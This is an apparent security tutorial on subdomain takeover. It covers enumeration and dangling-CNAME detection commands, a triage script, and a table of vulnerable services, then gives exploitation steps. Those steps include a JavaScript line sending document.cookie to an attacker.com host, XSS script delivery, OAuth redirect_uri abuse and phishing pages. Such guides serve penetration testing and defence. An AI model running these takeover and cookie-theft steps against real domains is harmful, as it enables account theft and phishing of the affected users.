Subdomain Takeover

Subdomain takeover: detect dangling DNS records (CNAME pointing to unclaimed services), claim the target, host malicious content, and chain to cookie theft, OAuth, and phishing. Full discovery and exploitation workflow.

What is Subdomain Takeover

A subdomain takeover occurs when:

  1. sub.victim.com has a CNAME pointing to a third-party service (e.g., victim.github.io, victim.s3.amazonaws.com).
  2. The victim stopped using that third-party service but did not remove the DNS CNAME.
  3. An attacker claims that third-party service name (creates a GitHub Pages repo named victim, claims the S3 bucket, etc.).
  4. Now sub.victim.com resolves to content the attacker controls.

Detection

Step 1 — Enumerate subdomains

# Subfinder (passive)
subfinder -d victim.com -o subdomains.txt

# Amass (active + passive)
amass enum -d victim.com -o amass_out.txt

# DNS brute force
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
     -u https://FUZZ.victim.com -fs 0

# Certificate transparency
curl -s "https://crt.sh/?q=%.victim.com&output=json" | jq -r '.[].name_value' | sort -u

Step 2 — Check for dangling CNAMEs

# For each subdomain, check the CNAME and whether its target still resolves
while read -r sub; do
  cname=$(dig +short CNAME "$sub")
  if [ -n "$cname" ]; then
    echo "$sub -> $cname"
    # Check whether the CNAME target still exists (no answer = NXDOMAIN = dangling)
    ip=$(dig +short "$cname")
    [ -z "$ip" ] && echo "  [!] DANGLING: $cname does not resolve"
    # Caveat: some providers (S3, GitHub Pages) resolve unclaimed names too,
    # so also check the HTTP response for the fingerprints in Step 3
  fi
done < subdomains.txt

Step 3 — Identify vulnerable service

When you find a dangling CNAME, visit the URL. The error message often reveals which service it pointed to:

Error message                                   | Service
------------------------------------------------|---------------
There isn't a GitHub Pages site here            | GitHub Pages
NoSuchBucket                                    | AWS S3
404 Not Found (Heroku header)                   | Heroku
This domain isn't connected to a store          | Shopify
No such app                                     | Azure/Heroku
This site can't be reached (with SRV/MX record) | Email provider
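Combining the Step 2 DNS check with the Step 3 error fingerprints, as an added example that is not part of the original page: a small Python triage that follows the CNAME chain and then matches the fetched body, so the case where the provider's name still resolves but no tenant owns it (S3, GitHub Pages) is not missed. The zone data, IP addresses and response bodies are constructed sample input.

```python
# Added example (not from the page): offline triage of CNAME records. The DNS data
# and HTTP bodies are constructed; a real run feeds in dig output and fetched pages.
# Error-page fingerprints from the table above: substring -> service.
FINGERPRINTS = {
    "There isn't a GitHub Pages site here": "GitHub Pages",
    "NoSuchBucket": "AWS S3",
    "This domain isn't connected to a store": "Shopify",
    "No such app": "Azure/Heroku",
}
# Constructed zone: name -> ("CNAME", target) or ("A", ip); a missing name is NXDOMAIN.
RECORDS = {
    "blog.example.com": ("CNAME", "acme-docs.github.io"),
    "acme-docs.github.io": ("A", "192.0.2.10"),
    "files.example.com": ("CNAME", "acme-assets.s3.amazonaws.com"),
    "acme-assets.s3.amazonaws.com": ("A", "198.51.100.20"),  # resolves even if unclaimed
    "old.example.com": ("CNAME", "acme-legacy.herokuapp.com"),  # app deleted, name gone
    "www.example.com": ("A", "203.0.113.5"),
}
# Constructed HTTP bodies as fetched from each subdomain.
BODIES = {
    "blog.example.com": "<html>Acme docs</html>",
    "files.example.com": "<Error><Code>NoSuchBucket</Code></Error>",
    "old.example.com": "",
}

def resolve_chain(name, records, max_hops=8):
    """Follow CNAMEs; return "A" if the chain ends at an address, else "NXDOMAIN"."""
    for _ in range(max_hops):
        rec = records.get(name)
        if rec is None:
            return "NXDOMAIN"
        if rec[0] == "A":
            return "A"
        name = rec[1]
    return "NXDOMAIN"  # loop or over-long chain: treat as unresolvable

def triage(sub, records, body):
    """Classify one subdomain as no-cname, ok, dangling or unclaimed."""
    rec = records.get(sub)
    if rec is None or rec[0] != "CNAME":
        return {"sub": sub, "cname": None, "status": "no-cname", "service": None}
    service = next((s for pat, s in FINGERPRINTS.items() if pat in body), None)
    if resolve_chain(rec[1], records) == "NXDOMAIN":
        status = "dangling"    # the dig check in Step 2 catches this case
    elif service:
        status = "unclaimed"   # target resolves (provider wildcard) but no tenant owns it
    else:
        status = "ok"
    return {"sub": sub, "cname": rec[1], "status": status, "service": service}
```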

Step 4 — Automated check with nuclei

nuclei -l subdomains.txt -t ~/nuclei-templates/takeovers/ -o takeover-results.txt

Vulnerable Services Reference

Service           | Takeover method
------------------|-----------------------------------------------------------
GitHub Pages      | Create repo matching the CNAME target
AWS S3            | Create bucket with the exact CNAME name in the correct region
Azure App Service | Create App Service with the matching name
Heroku            | Create a Heroku app with the matching name
Fastly            | Claim the hostname in your Fastly account
Netlify           | Claim in Netlify with custom domain matching the CNAME
Cargo             | Create a new site at the matching Cargo name
Shopify           | Create a store with the matching subdomain

Exploitation

Step 1 — Claim the service

Example for GitHub Pages:

  1. Create a GitHub repo named exactly what the CNAME points to (e.g., victim for victim.github.io).
  2. Enable GitHub Pages in the repo settings.
  3. Visit sub.victim.com — it now serves your content.

Step 2 — Serve malicious content

Once you control the subdomain, you can:

Cookie theft

// If victim.com sets cookies for .victim.com
// sub.victim.com can read them
document.location = 'https://attacker.com/steal?cookie=' + document.cookie;

XSS delivery

Host an XSS payload accessible at sub.victim.com/payload.js:

<script src="https://sub.victim.com/payload.js"></script>

If the main application loads any JS from subdomains → XSS.

OAuth token theft

If the OAuth redirect_uri allows any subdomain of victim.com:

redirect_uri=https://sub.victim.com/callback

User authenticates → OAuth server redirects auth code to your controlled subdomain.

Phishing

Host a fake login page at mail.victim.com or login.victim.com — users trust the subdomain.

CORS bypass

If the main app reflects any *.victim.com origin into Access-Control-Allow-Origin (together with Access-Control-Allow-Credentials: true) → your controlled subdomain can make authenticated cross-origin requests.

Tools

# SubOver — checks takeover potential
git clone https://github.com/Ice3man543/SubOver
./SubOver -l subdomains.txt

# Can-I-Take-Over-XYZ — reference list of vulnerable fingerprints
# https://github.com/EdOverflow/can-i-take-over-xyz

# Subjack
./subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl

Burp Suite workflow

  1. Proxy — intercept responses from target subdomains; note CNAME headers or error messages.
  2. Use Burp’s Target → Scope to map all subdomains discovered during recon.
  3. Collaborator — verify DNS resolution of dangling subdomains.
  4. After claiming a subdomain, test cookie scope, CORS origin, and OAuth redirect_uri from the new subdomain.